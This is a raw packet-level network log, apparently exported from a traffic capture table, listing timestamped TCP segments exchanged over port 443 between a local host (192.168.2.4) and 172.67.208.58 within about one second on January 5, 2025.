                                                                                                                                                                                              Jan 5, 2025 18:08:35.740008116 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.740035057 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.740380049 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.740411997 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.740430117 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.740434885 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.740458965 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.740459919 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.740477085 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.740484953 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.740494013 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.740509033 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.740540981 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.741274118 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.741291046 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.741354942 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.741360903 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.741451979 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.741750002 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.741766930 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.741797924 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.741802931 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.741828918 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.741831064 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.741848946 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.741853952 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.741862059 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.741871119 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.741908073 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.742261887 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.742276907 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.742317915 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.742325068 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.742372990 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.742553949 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.828612089 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.828634024 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.828696966 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.828723907 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.828739882 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.828747988 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.828768015 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.828772068 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.828784943 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.828797102 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.828831911 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.828982115 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.828996897 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.829035044 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.829041004 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.829055071 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.829076052 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.829319000 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.829334974 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.829380989 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.829386950 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.829412937 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.829427958 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.830657959 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.830676079 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.830727100 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.830735922 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.831000090 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.831021070 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.831046104 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.831053019 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.831079960 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.831103086 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.831247091 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.831263065 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.831293106 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.831299067 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.831319094 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.831338882 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.831446886 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.831465006 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.831501007 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.831507921 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.831527948 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.831541061 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.831795931 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.833265066 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.917350054 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.917377949 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.917418957 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.917428970 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.917439938 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.917476892 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.917500019 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.917551994 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.917723894 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.917741060 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.917774916 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.917781115 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.917804003 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.917829037 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.917929888 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.917968988 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.917992115 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.918021917 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.918025970 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.918065071 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.918616056 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.918634892 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.918678999 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.918685913 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.919678926 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.919702053 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.919734001 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.919740915 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.919769049 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.919801950 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.919883013 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.919903994 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.919934988 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.919939995 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.919955969 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.919976950 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.920124054 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.920139074 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.920186043 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.920196056 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:35.920217037 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.920233965 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:35.922454119 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.005912066 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.005929947 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.005987883 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.005995989 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.006040096 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.006145954 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.006160021 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.006201982 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.006208897 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.006362915 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.006382942 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.006407022 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.006412029 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.006437063 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.006469965 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.006685019 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.006699085 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.006738901 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.006746054 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.007318974 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.007338047 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.007375956 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.007385969 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.008382082 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.008395910 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.008440971 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.008451939 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.008591890 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.008611917 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.008637905 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.008645058 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.008663893 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.008696079 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.008876085 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.008891106 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.008928061 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.008934975 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.008980036 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.009049892 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.094660997 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.094679117 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.094866037 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.094891071 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.094965935 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.095041990 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.095061064 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.095117092 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.095123053 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.095134020 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.095155001 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.095168114 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.095175028 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.095207930 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.095227003 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.095415115 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.095429897 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.095474005 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.095482111 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.095535040 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.096046925 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.096064091 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.096116066 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.096123934 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.096170902 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.097043037 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.097059965 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.097110033 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.097115993 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.097157955 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.097419977 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.097434044 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.097481012 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.097489119 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.097527027 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.097589970 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.097632885 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.097650051 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.097656012 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.097692013 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.097700119 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.097918034 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.183521986 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.183537960 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.183623075 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.183631897 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.183679104 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.183686018 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.183691978 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.183708906 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.183737040 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.183768988 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.183773994 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.183995008 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.184010029 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.184076071 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.184076071 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.184087038 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.184303999 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.184322119 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.184366941 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.184374094 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.184400082 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.184427977 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.184845924 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.184876919 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.184916973 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.184923887 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.184950113 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.184967041 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.185774088 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.185789108 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.185863018 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.185869932 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.185914040 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.185998917 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.186116934 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.186131954 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.186192989 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.186199903 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.186242104 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.186341047 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.186356068 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.186394930 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.186400890 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.186424971 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.186444998 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.187414885 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.272918940 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.272941113 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.273016930 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.273037910 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.273077011 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.273123026 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.273139000 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.273175955 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.273183107 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.273219109 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.273241043 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.273672104 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.273688078 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.273745060 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.273751974 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.273787022 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.274096012 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.274111032 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.274163961 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.274171114 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.274207115 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.274561882 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.274579048 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.274631977 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.274637938 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.274674892 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.275562048 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.275600910 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.275645971 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.275650978 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.275660992 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.275671005 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.275682926 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:36.275696993 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.275747061 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:36.275754929 CET44349758172.67.208.58192.168.2.4
